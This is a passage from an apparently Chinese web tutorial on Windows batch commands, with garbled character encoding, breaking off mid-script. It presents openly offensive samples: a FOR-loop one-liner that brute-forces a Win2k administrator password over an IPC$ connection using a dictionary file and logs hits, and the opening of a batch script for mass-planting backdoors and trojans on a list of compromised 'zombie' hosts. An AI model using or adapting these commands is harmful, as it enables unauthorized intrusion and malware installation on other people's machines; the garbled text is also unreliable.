主頁(yè) > 數(shù)碼科技 > 臺(tái)式機(jī) > 什么是批處理批處理命令

什么是批處理批處理命令大全(8)

作者: nlvkyk 2013-07-31 14:09　[查查吧]：uabf.cn

　　sample2：

　　利用For命令來實(shí)現(xiàn)對(duì)一臺(tái)目標(biāo)Win2k主機(jī)的暴力密碼破解。

　　我們用net use \\ip\ipc$ "password" /u:"administrator"來嘗試這和目標(biāo)主機(jī)進(jìn)行連接，當(dāng)成功時(shí)記下密碼。

　　最主要的命令是一條：for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"

　　用i%來表示admin的密碼，在dict.txt中這個(gè)取i%的值用net use 命令來連接。然后將程序運(yùn)行結(jié)果傳遞給find命令--

　　for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\ok.txt ，這樣就ko了。

　　sample3：

　　你有沒有過手里有大量肉雞等著你去種后門+木馬呢?，當(dāng)數(shù)量特別多的時(shí)候，原本很開心的一件事都會(huì)變得很郁悶：)。文章開頭就談到使用批處理文件，可以簡(jiǎn)化日?；蛑貜?fù)性任務(wù)。那么如何實(shí)現(xiàn)呢?呵呵，看下去你就會(huì)明白了。

　　主要命令也只有一條：(在批處理文件中使用 FOR 命令時(shí)，指定變量使用 %%variable)

　　@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k

　　tokens的用法請(qǐng)參見上面的sample1，在這里它表示按順序?qū)ictim.txt中的內(nèi)容傳遞給door.bat中的參數(shù)%i %j %k。

　　而cultivate.bat無非就是用net use命令來建立IPC$連接，并copy木馬+后門到victim，然后用返回碼(If errorlever =)來篩選成功種植后門的主機(jī)，并echo出來，或者echo到指定的文件。

　　delims= 表示vivtim.txt中的內(nèi)容是一空格來分隔的。我想看到這里你也一定明白這victim.txt里的內(nèi)容是什么樣的了。應(yīng)該根據(jù)%%i %%j %%k表示的對(duì)象來排列，一般就是 ip password username。

　　代碼雛形：

　　--------------- cut here then save as a batchfile(I call it main.bat ) --------------------

　　@echo off

　　@if "%1"=="" goto usage

　　@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k

　　@goto end

　　:usage